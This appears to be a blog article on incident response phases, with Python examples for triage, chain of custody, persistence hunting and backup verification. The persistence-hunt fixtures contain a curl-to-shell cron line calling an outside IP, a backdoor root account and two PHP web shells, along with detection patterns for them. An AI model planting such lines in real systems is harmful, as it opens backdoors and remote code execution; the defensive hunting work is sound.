You don’t rise to the occasion. You fall to the level of your preparation. Every military strategist, every firefighter, every trauma surgeon knows this — and every security team learns it the hard way at 2 AM on a Saturday when the SIEM lights up like a Christmas tree and nobody can find the runbook.
Incident response isn’t a product you buy. It’s a muscle you build. And if you haven’t exercised it before the breach, you’re not responding — you’re improvising. That’s a bad look when the board is asking questions and the attackers are already on day 47 inside your network.
The TLDR
Every organization will face a security incident. The difference between a contained event and a catastrophic breach is whether you had a plan, practiced it, and actually followed it when the adrenaline hit. The six phases of incident response — preparation, identification, containment, eradication, recovery, and lessons learned — aren’t optional steps. They’re the difference between “we handled it” and “we’re on the news.”
The Reality
Here’s the uncomfortable math. IBM’s Cost of a Data Breach Report has put the mean time to identify a breach at around 200 days year after year (the Verizon DBIR doesn’t measure dwell time directly, and responder-reported medians such as Mandiant’s M-Trends are far lower, in the tens of days, because a median isn’t dragged up by the intrusions nobody noticed for a year). Call it 200 days: that’s how long an attacker lives inside your network before anyone notices. Two hundred days. They’re reading your email, mapping your infrastructure, exfiltrating your data, and you’re wondering why the file server is a little slow on Thursdays.
Worse: most organizations don’t discover breaches themselves. They find out from law enforcement, a journalist, or a customer who noticed their credit card got used in three countries simultaneously. The call is coming from outside the house. It usually is.
The first hour of an incident matters more than any hour that follows. And most teams waste it. They waste it panicking, arguing about who has authority to shut down a server, trying to find a phone number for legal counsel, and — this is the classic — accidentally destroying forensic evidence by rebooting compromised machines. The attacker planned their operation for weeks. You’re running yours in real-time with no script. That’s not a fair fight.
How It Works
The reference document is NIST SP 800-61r2, the Computer Security Incident Handling Guide. NIST itself describes four phases (preparation; detection and analysis; containment, eradication and recovery; post-incident activity). The six-phase version below is the SANS PICERL breakdown, which splits NIST’s middle phases apart and renames the rest; the content is the same, and each phase matters. Skip one, and the whole thing falls apart.
Phase 1: Preparation
This is the phase that happens before anything goes wrong — which is exactly why most organizations skip it. Preparation means having written policies, a defined incident response team with clear roles, communication plans (internal and external), pre-arranged legal counsel, and pre-negotiated contracts with forensic firms. You don’t want to be Googling “digital forensics near me” during an active breach.
It also means tooling. Do you have centralized logging? Can you actually isolate a compromised endpoint without taking down half the network? Is your backup strategy tested, or just theoretically sound? CISA publishes regular advisories — are you reading them, or are they going to an inbox nobody checks?
Phase 2: Identification
Something looks wrong. Maybe your SIEM fired an alert. Maybe EDR flagged a suspicious process. Maybe someone in accounting got a weird email and — credit to them — actually reported it instead of clicking the link. Detection sources include SIEM correlation rules, EDR telemetry, threat intelligence feeds, network anomaly detection, and good old-fashioned human intuition.
Triage is critical here. Not every alert is an incident, and not every incident is a crisis. You need severity classification criteria defined in advance, so the on-call analyst grades an alert against a table rather than against their nerves. Is this a commodity malware infection on a single workstation, or is this lateral movement from a compromised domain admin account? The response looks very different. Map what you’re seeing to MITRE ATT&CK techniques: the tactic a technique belongs to tells you how far along the intrusion is and which tactics usually come next, which is what you hunt for while containment is being planned.
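What "severity criteria defined in advance" looks like when written down as code, as an added example for this article (not code from the page, NIST or MITRE): each alert is placed in the ATT&CK lifecycle by its technique's tactic, then scored on stage, asset criticality, account privilege and scope against fixed bands. The technique IDs and tactic order are real ATT&CK Enterprise values; the alert records, the weights and the P1..P4 thresholds are constructed assumptions that every IR plan has to set for itself.

```python
"""Alert triage: grade alerts by pre-agreed criteria, using ATT&CK tactics to place
each one in the intrusion lifecycle.

Added example for the article, not code from the page or from NIST/MITRE.
Technique IDs and tactic order are real ATT&CK Enterprise values; the alerts,
weights and thresholds are constructed assumptions.
"""
from dataclasses import dataclass

# ATT&CK Enterprise tactics in lifecycle order; the index is how far along the attacker is.
TACTICS = [
    "Reconnaissance", "Resource Development", "Initial Access", "Execution",
    "Persistence", "Privilege Escalation", "Defense Evasion", "Credential Access",
    "Discovery", "Lateral Movement", "Collection", "Command and Control",
    "Exfiltration", "Impact",
]
STAGE = {t: i for i, t in enumerate(TACTICS)}

# Hand-picked technique -> primary tactic table (real IDs). A real deployment would
# load the ATT&CK STIX bundle rather than hard-code this.
TECHNIQUE_TACTIC = {
    "T1566.001": "Initial Access",        # Phishing: Spearphishing Attachment
    "T1204.002": "Execution",             # User Execution: Malicious File
    "T1053.005": "Persistence",           # Scheduled Task/Job: Scheduled Task
    "T1078.002": "Privilege Escalation",  # Valid Accounts: Domain Accounts
    "T1021.001": "Lateral Movement",      # Remote Services: RDP
    "T1486":     "Impact",                # Data Encrypted for Impact
}

# Assumed weights (set these in your own plan; they are illustrative here).
ASSET_WEIGHT = {"workstation": 1, "server": 2, "identity": 3}   # identity = DC / IdP
PRIV_WEIGHT = {"user": 0, "local-admin": 2, "domain-admin": 3}


def stage_weight(tactic: str) -> int:
    """Later lifecycle stages score higher: an attacker at Lateral Movement has
    already done everything before it."""
    i = STAGE[tactic]
    if i <= STAGE["Initial Access"]:
        return 1
    if i <= STAGE["Discovery"]:
        return 2
    if i < STAGE["Impact"]:
        return 3
    return 4


@dataclass(frozen=True)
class Alert:
    source: str       # SIEM, EDR, email gateway, user report, ...
    technique: str    # ATT&CK technique ID
    asset: str        # workstation | server | identity
    privilege: str    # user | local-admin | domain-admin
    hosts: int        # distinct hosts involved so far
    summary: str


def score(alert: Alert) -> int:
    tactic = TECHNIQUE_TACTIC[alert.technique]
    scope = 0 if alert.hosts <= 1 else 1 if alert.hosts <= 5 else 2
    return stage_weight(tactic) + ASSET_WEIGHT[alert.asset] + PRIV_WEIGHT[alert.privilege] + scope


def severity(alert: Alert) -> str:
    """Assumed thresholds: P1 wakes people up, P4 waits for business hours."""
    s = score(alert)
    return "P1" if s >= 8 else "P2" if s >= 6 else "P3" if s >= 3 else "P4"


def likely_next(alert: Alert, n: int = 2) -> list[str]:
    """Tactics that typically follow the one observed: what to hunt for next."""
    i = STAGE[TECHNIQUE_TACTIC[alert.technique]]
    return TACTICS[i + 1:i + 1 + n]


def triage(alerts):
    """Highest score first: the order the on-call analyst should work the queue."""
    return sorted(((severity(a), score(a), a) for a in alerts), key=lambda r: r[1], reverse=True)


# Constructed alerts, not real telemetry.
SAMPLE_ALERTS = [
    Alert("email-gw", "T1566.001", "workstation", "user", 1, "phish reported by accounting, link not clicked"),
    Alert("EDR", "T1204.002", "workstation", "user", 1, "commodity infostealer on one laptop"),
    Alert("SIEM", "T1078.002", "identity", "domain-admin", 1, "domain admin auth from a country we don't operate in"),
    Alert("SIEM", "T1021.001", "server", "local-admin", 12, "RDP fan-out from one server to 12 others"),
]

if __name__ == "__main__":
    for sev, s, a in triage(SAMPLE_ALERTS):
        print(f"{sev} (score {s}) {a.summary}; hunt next for: {', '.join(likely_next(a))}")
```

The point of the table is not the particular numbers but that they exist before the incident: the reported-but-unclicked phish lands at P4, the single infostealer at P3, and both the foreign domain-admin logon and the RDP fan-out at P1, without anyone having to argue about it at 2 AM.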
Phase 3: Containment
Now you know it’s real. The instinct is to pull the plug: yank the network cable, shut everything down, salt the earth. Sometimes that’s correct. Usually it’s not. Containment has two modes: short-term and long-term. Short-term containment means isolating the affected systems to stop the bleeding: network segmentation, disabling compromised accounts, blocking known-bad IPs. Long-term containment means standing up clean parallel systems while you figure out the full scope. One caveat practitioners learn the hard way: piecemeal containment tips off the attacker. Disable one account and they pivot to the three others you haven’t found yet, or detonate the ransomware early. Enumerate the scope as far as you can, then execute the containment steps together.
Here’s the critical part most people botch: evidence preservation. The moment you reboot that compromised server, you lose volatile memory: running processes, network connections, loaded modules, keys that were only ever in RAM. That’s forensic gold, and it’s gone. Collect in order of volatility (RFC 3227 spells it out: memory and network state first, disk later, remote logs and archives last). Capture memory images before anything else. Image the disk. Hash every artifact at the moment of acquisition and document who held it and when. Chain of custody matters, especially if this ends up in court or you have a reporting obligation: CISA reporting under CIRCIA for covered critical-infrastructure entities once its implementing rule takes effect, the SEC’s four-business-day Form 8-K disclosure for public companies with a material incident, or whatever your sector regulator requires.
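An added example of the two evidence disciplines above, written for this article rather than taken from the page or any forensic suite: a hash-chained chain-of-custody ledger, where every entry commits to the previous one so a later edit or deletion is detectable, plus a check that artifacts were acquired in RFC 3227 order of volatility. The artifacts are short constructed byte strings standing in for a memory image, a netstat capture and a disk image, and the custodian names are made up.

```python
"""Chain of custody with a tamper-evident ledger, plus an order-of-volatility check.

Added example for the article, not code from the page or any forensic product.
Volatility order follows RFC 3227; artifacts and custodians are constructed.
"""
import hashlib
import json
from datetime import datetime, timezone

# RFC 3227 order of volatility, most volatile first. Collect top to bottom.
ORDER_OF_VOLATILITY = [
    "registers/cache", "memory", "network state/process table",
    "temporary filesystems", "disk", "remote logs", "physical config/topology",
    "archival media",
]
RANK = {c: i for i, c in enumerate(ORDER_OF_VOLATILITY)}
GENESIS = "0" * 64


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


class CustodyLedger:
    """Append-only log. Every entry commits to the previous entry's hash, so editing,
    reordering or deleting an entry breaks every hash after it."""

    def __init__(self):
        self.entries: list[dict] = []

    def _append(self, fields: dict) -> dict:
        entry = dict(fields, seq=len(self.entries),
                     prev=self.entries[-1]["hash"] if self.entries else GENESIS)
        entry["hash"] = sha256(json.dumps(entry, sort_keys=True).encode())
        self.entries.append(entry)
        return entry

    def collect(self, artifact: str, data: bytes, category: str, collector: str, when: datetime) -> dict:
        """Hash the artifact at acquisition; that hash is what every later custodian verifies."""
        if category not in RANK:
            raise ValueError(f"unknown volatility category {category!r}")
        return self._append({"action": "collected", "artifact": artifact, "category": category,
                             "sha256": sha256(data), "size": len(data),
                             "custodian": collector, "time": when.isoformat()})

    def transfer(self, artifact: str, to: str, when: datetime) -> dict:
        """Hand-off to another custodian (e.g. the retained forensic firm), carrying the original hash."""
        origin = next(e for e in self.entries if e["artifact"] == artifact and e["action"] == "collected")
        return self._append({"action": "transferred", "artifact": artifact, "category": origin["category"],
                             "sha256": origin["sha256"], "size": origin["size"],
                             "custodian": to, "time": when.isoformat()})

    def verify(self):
        """Recompute the chain. Returns the seq of the first broken entry, or None if intact."""
        prev = GENESIS
        for e in self.entries:
            body = {k: v for k, v in e.items() if k != "hash"}
            if e["prev"] != prev or sha256(json.dumps(body, sort_keys=True).encode()) != e["hash"]:
                return e["seq"]
            prev = e["hash"]
        return None

    def volatility_violations(self):
        """Artifacts collected after something less volatile than themselves (memory imaged
        after the disk, say): the evidence may already have been degraded by the wait."""
        violations, least_volatile_seen = [], -1
        for e in self.entries:
            if e["action"] != "collected":
                continue
            r = RANK[e["category"]]
            if r < least_volatile_seen:
                violations.append(e["artifact"])
            least_volatile_seen = max(least_volatile_seen, r)
        return violations


def demo_good() -> CustodyLedger:
    """Correct order: memory, then network state, then disk, then hand-off. All constructed."""
    t0 = datetime(2024, 3, 2, 2, 15, tzinfo=timezone.utc)
    led = CustodyLedger()
    led.collect("srv-fs01.mem", b"fake memory image bytes", "memory", "j.doe", t0)
    led.collect("srv-fs01.netstat.txt", b"tcp 10.0.4.7:49152 203.0.113.9:443 ESTABLISHED\n",
                "network state/process table", "j.doe", t0.replace(minute=22))
    led.collect("srv-fs01.dd", b"fake disk image bytes", "disk", "j.doe", t0.replace(hour=3))
    led.transfer("srv-fs01.dd", "forensic-firm", t0.replace(hour=9))
    return led


def demo_wrong_order() -> CustodyLedger:
    """The classic mistake: disk imaged first, memory only afterwards."""
    t0 = datetime(2024, 3, 2, 2, 15, tzinfo=timezone.utc)
    led = CustodyLedger()
    led.collect("srv-fs01.dd", b"fake disk image bytes", "disk", "j.doe", t0)
    led.collect("srv-fs01.mem", b"fake memory image bytes", "memory", "j.doe", t0.replace(hour=4))
    return led


if __name__ == "__main__":
    led = demo_good()
    print("intact:", led.verify() is None, "violations:", led.volatility_violations())
    print("wrong order violations:", demo_wrong_order().volatility_violations())
```

The ledger does not make the evidence admissible by itself; it makes any later discrepancy between what was collected and what is presented provable, which is what counsel and the forensic firm will ask for.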
Phase 4: Eradication
You’ve stopped the bleeding. Now find the bullet. Root cause analysis means understanding exactly how the attacker got in, what they did, and what persistence mechanisms they left behind. Backdoor accounts, scheduled tasks, modified startup scripts, web shells — attackers don’t break in once and hope for the best. They plant insurance. Reference MITRE ATT&CK Persistence techniques (TA0003) for the full catalog of ways they stay.
Patch the entry vector. If it was a phishing email that delivered a payload exploiting an unpatched vulnerability, patch the vuln, retrain the people, and add detection rules for the specific TTP used. If you don’t eradicate the root cause, you’re just resetting a timer.
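An added example of the persistence hunt described in this phase, written for the article and not taken from the page or any EDR product. It runs heuristics over constructed Linux artifacts (a crontab, a passwd file and a web root) and tags each hit with the ATT&CK technique it corresponds to, so the findings feed straight into the detection rules mentioned above. The technique IDs are real; the artifact contents are made up, and the indicators cover only the mechanisms the text names (cron jobs, backdoor accounts, web shells), not the whole of TA0003.

```python
"""Persistence hunt over constructed Linux artifacts, findings tagged with ATT&CK IDs.

Added example for the article, not code from the page or any security product.
Technique IDs are real; crontab, passwd and web-root contents are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    technique: str   # ATT&CK technique ID
    location: str
    reason: str


# Cron indicators -> T1053.003 (Scheduled Task/Job: Cron)
CRON_INDICATORS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"), "downloads a script and pipes it to a shell"),
    (re.compile(r"(^|[\s=])/(tmp|var/tmp|dev/shm)/"), "runs a binary from a world-writable path"),
    (re.compile(r"base64\s+(-d|--decode)\b"), "decodes an embedded payload at run time"),
]
# PHP web shell indicator -> T1505.003 (Server Software Component: Web Shell):
# a code-execution function fed directly from request input.
WEBSHELL = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(.*?\$_(GET|POST|REQUEST|COOKIE)\b",
    re.I | re.S)


def hunt_cron(crontab: str) -> list[Finding]:
    findings = []
    for n, line in enumerate(crontab.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        for pattern, reason in CRON_INDICATORS:
            if pattern.search(line):
                findings.append(Finding("T1053.003", f"crontab:{n}", reason))
    return findings


def hunt_passwd(passwd: str) -> list[Finding]:
    """Backdoor accounts: any UID-0 account that is not root (T1136.001, Create Account: Local Account)."""
    findings = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and fields[2] == "0" and fields[0] != "root":
            findings.append(Finding("T1136.001", f"passwd:{fields[0]}", "extra UID-0 account"))
    return findings


def hunt_webroot(files: dict[str, str]) -> list[Finding]:
    return [Finding("T1505.003", path, "request parameter reaches a code-execution function")
            for path, src in files.items() if WEBSHELL.search(src)]


def hunt_all(crontab: str, passwd: str, webroot: dict[str, str]) -> list[Finding]:
    return hunt_cron(crontab) + hunt_passwd(passwd) + hunt_webroot(webroot)


# Constructed artifacts standing in for what you would pull from the compromised host.
CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://198.51.100.23/u.sh | sh
@reboot /dev/shm/.x/agent -d
30 1 * * 0 /opt/monitoring/rotate.sh
"""

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
support:x:0:1005::/tmp:/bin/bash
alice:x:1001:1001::/home/alice:/bin/bash
"""

WEBROOT = {
    "/var/www/html/index.php": "<?php require 'app/bootstrap.php'; ?>",
    "/var/www/html/uploads/cache.php": "<?php @eval(base64_decode($_POST['k'])); ?>",
    "/var/www/html/assets/img.php": "<?php if(isset($_GET['c'])){system($_GET['c']);} ?>",
}

if __name__ == "__main__":
    for f in hunt_all(CRONTAB, PASSWD, WEBROOT):
        print(f"{f.technique}  {f.location}: {f.reason}")
```

Every finding here is a lead, not a verdict; the legitimate backup and rotation jobs are untouched, while the curl-to-shell job, the agent in /dev/shm, the second UID-0 account and both PHP files that pass request parameters into eval()/system() come out tagged with the technique a detection rule should be written for. A real hunt extends the same approach to systemd units, SSH authorized_keys, shell profiles and LD_PRELOAD entries.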
Phase 5: Recovery
Restoration from known-clean backups. Not “probably clean.” Known-clean. If your backups were reachable from the compromised network, and they often are, you need to verify their integrity before you trust them. Attackers increasingly target backup infrastructure specifically because they know it’s your escape hatch: they delete snapshots, corrupt archives, or sit quietly inside a backup that predates detection so the restore brings them back with your data. That is why at least one copy belongs offline or on immutable storage, with hashes recorded somewhere the attacker couldn’t reach, and why the backup platform must not share the domain admin credentials the attacker already has.
Recovery is phased. You don’t flip everything back on at once. Bring systems back in priority order, monitor aggressively for signs of re-compromise, and validate that your eradication was actually complete. NIST SP 800-184 covers cyber event recovery in detail.
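The "known-clean, not probably clean" test from the previous paragraphs, as an added example written for this article (not code from the page or any backup product). It assumes an offline, write-once manifest of snapshot hashes recorded when each backup was taken, and an earliest-known-compromise time from the investigation timeline; a snapshot is only trusted if its hash still matches that manifest and it predates the compromise by a margin you choose. The snapshots, hashes and timestamps are constructed.

```python
"""Pick a known-clean restore point: offline hash manifest + compromise timeline.

Added example for the article, not code from the page or any backup product.
Snapshots, hashes and the compromise timestamp are constructed.
"""
import hashlib
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


@dataclass(frozen=True)
class Snapshot:
    name: str
    taken: datetime
    content: bytes   # stand-in for the archive as it sits on the (reachable) backup server


def classify(snap: Snapshot, manifest: dict[str, str], compromise_start: datetime, margin: timedelta) -> str:
    """
    clean            hash matches the offline manifest and the backup predates the
                     earliest known attacker activity by at least `margin`
    tampered         hash differs from the manifest: the copy on the backup server was altered
    unverifiable     no offline record exists, so integrity cannot be established
    post-compromise  intact, but taken after (or too close to) the attacker's arrival,
                     so restoring it may restore their persistence as well
    """
    expected = manifest.get(snap.name)
    if expected is None:
        return "unverifiable"
    if sha256(snap.content) != expected:
        return "tampered"
    if snap.taken > compromise_start - margin:
        return "post-compromise"
    return "clean"


def report(snapshots, manifest, compromise_start, margin=timedelta(0)) -> dict[str, str]:
    return {s.name: classify(s, manifest, compromise_start, margin) for s in snapshots}


def choose_restore_point(snapshots, manifest, compromise_start, margin=timedelta(0)):
    """Newest snapshot that is known-clean, or None if there is no trustworthy backup at all."""
    clean = [s for s in snapshots if classify(s, manifest, compromise_start, margin) == "clean"]
    return max(clean, key=lambda s: s.taken, default=None)


UTC = timezone.utc
# Constructed snapshots as found on the backup server after the incident.
SNAPSHOTS = [
    Snapshot("fs01-2024-02-10", datetime(2024, 2, 10, 2, 0, tzinfo=UTC), b"fs01 full backup 2024-02-10"),
    Snapshot("fs01-2024-02-20", datetime(2024, 2, 20, 2, 0, tzinfo=UTC), b"fs01 full backup 2024-02-20"),
    Snapshot("fs01-2024-02-27", datetime(2024, 2, 27, 2, 0, tzinfo=UTC), b"fs01 full backup 2024-02-27 + attacker edits"),
    Snapshot("fs01-2024-03-01", datetime(2024, 3, 1, 2, 0, tzinfo=UTC), b"fs01 full backup 2024-03-01"),
    Snapshot("fs01-2024-03-05", datetime(2024, 3, 5, 2, 0, tzinfo=UTC), b"fs01 full backup 2024-03-05"),
]
# Constructed offline manifest, written at backup time to storage the attacker could not reach.
# The 02-27 entry holds the original (pre-tamper) hash; 03-05 was never recorded offline.
OFFLINE_MANIFEST = {
    "fs01-2024-02-10": sha256(b"fs01 full backup 2024-02-10"),
    "fs01-2024-02-20": sha256(b"fs01 full backup 2024-02-20"),
    "fs01-2024-02-27": sha256(b"fs01 full backup 2024-02-27"),
    "fs01-2024-03-01": sha256(b"fs01 full backup 2024-03-01"),
}
# Earliest attacker activity on the investigation timeline (constructed).
COMPROMISE_START = datetime(2024, 2, 28, 14, 30, tzinfo=UTC)

if __name__ == "__main__":
    for name, verdict in report(SNAPSHOTS, OFFLINE_MANIFEST, COMPROMISE_START).items():
        print(f"{name}: {verdict}")
    pick = choose_restore_point(SNAPSHOTS, OFFLINE_MANIFEST, COMPROMISE_START, timedelta(days=10))
    print("restore from:", pick.name if pick else "nothing trustworthy")
```

The margin is where the dwell-time problem bites: "earliest known" activity is a lower bound on how long the attacker has been there, so a wider margin trades more data loss for more confidence, and a margin wide enough to exclude every backup is a finding in itself, not a bug.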
Phase 6: Lessons Learned
The blameless postmortem. What happened, when, how did the team respond, what worked, what didn’t, and what changes need to be made. This isn’t a witch hunt — it’s a calibration session. Update your playbooks. Update your detection rules. Update your preparation phase. The whole cycle feeds back into itself.
Organizations that skip this phase are doomed to have the same incident twice. That’s not bad luck. That’s negligence.
How It Gets Exploited
Ransomware crews profit most from organizations without IR plans. They know that a panicked team with no playbook is more likely to pay. Double extortion (encrypt the data AND threaten to leak it) works because organizations without incident response plans also tend to lack the communication strategy needed to manage a public disclosure.
Timing is deliberate. Major ransomware deployments disproportionately land on Friday evenings, holiday weekends, and during corporate transitions (mergers, layoffs, leadership changes). The attacker wants maximum time before anyone competent notices. The joint CISA/FBI advisory AA21-243A, Ransomware Awareness for Holidays and Weekends, documented the pattern after a run of holiday-weekend attacks in 2021.
The usual suspects also know that most organizations will panic-destroy evidence. They’re counting on it. A company that wipes and reimages everything in a frenzy has just eliminated any chance of understanding the full scope, identifying all compromised accounts, or building a legal case.
What You Can Do
Build a minimal IR plan. It doesn’t need to be a 200-page document. It needs to answer: who’s on the team, how do you reach them at 3 AM, who has authority to isolate systems, who calls legal, who talks to the press, and where are the runbooks? Write it down. Print it out. Put a copy somewhere that isn’t on the network that might be compromised.
Run tabletop exercises. Quarterly at minimum. Sit the team down and walk through scenarios. “We just got alerted that a domain admin account is authenticating from an IP in a country we don’t operate in. What do we do?” If the answer involves uncomfortable silence and people looking at their phones, you have work to do.
Establish relationships with legal counsel and a forensic firm before you need them. Retainers exist for a reason. The time to negotiate a contract is not during an active breach.
And for the love of everything: don’t pay the ransom without consulting legal counsel first. Paying a sanctioned actor can be an OFAC sanctions violation even if you didn’t know who you were paying (OFAC’s ransomware advisory states that penalties can be imposed on a strict-liability basis), and there’s zero guarantee you’ll get your data back. The FBI IC3 wants to hear from you. Let them.
Related Deep Dives
- SOC Operations — the team that detects incidents before they escalate